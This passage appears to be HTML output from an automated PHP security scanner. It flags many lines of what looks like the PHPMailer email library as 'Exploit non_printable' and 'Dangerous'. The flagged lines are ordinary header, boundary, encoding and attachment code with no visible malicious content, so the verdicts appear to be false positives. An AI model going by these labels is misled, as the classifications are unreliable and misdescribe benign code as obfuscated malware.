<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]), </span><span style="color: #DD0000">'phrase'</span><span style="color: #007700">) . </span><span style="color: #DD0000">' <' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2138</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wrapText</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$length</span><span style="color: #007700">, </span><span style="color: #0000BB">$qp_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2225</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$message</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2235</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">integer</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">utf8CharBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$encodedText</span><span style="color: #007700">, </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2282</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setWordWrap</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled headers</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createHeader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2401</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getMailMIME</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2449</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the whole MIME message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSentMIMEMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailHeader</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n\r"</span><span style="color: #007700">) . </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2465</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generateId</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">uniqid</span><span style="color: #007700">(</span><span style="color: #0000BB">time</span><span style="color: #007700">()));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2474</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled message body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createBody</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2662</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by openssl contains both headers </span><span style="color: #007700">and </span><span style="color: #0000BB">body</span><span style="color: #007700">, </span><span style="color: #0000BB">so need to split them up</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2678</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the start of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2690</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">, </span><span style="color: #0000BB">$charSet</span><span style="color: #007700">, </span><span style="color: #0000BB">$contentType</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2715</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the end of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2720</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">endBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2722</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$boundary </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2731</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMessageType</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2757</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">headerLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">a formatted mail line</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2768</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">textLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the file could not be found </span><span style="color: #007700">or </span><span style="color: #0000BB">read</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2787</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAttachment</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'attachment'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the </span><span style="color: #007700">array </span><span style="color: #0000BB">of attachments</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2830</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2832</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">attachment</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachAll</span><span style="color: #007700">(</span><span style="color: #0000BB">$disposition_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">text of body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2956</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mime</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2968</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns false in 5.4</span><span style="color: #007700">+</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2997</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file_buffer</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeString</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3037</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3048</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3057</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3059</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #DD0000">"\"</span><span style="color: #0000BB">$encoded</span><span style="color: #DD0000">\""</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3076</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">) && </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">which correctly encodes </span><span style="color: #007700">and </span><span style="color: #0000BB">wraps long</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3112</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3114</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3115</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">) > </span><span style="color: #0000BB">mb_strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CharSet</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions anyway</span><span style="color: #007700">)</span>
</span>
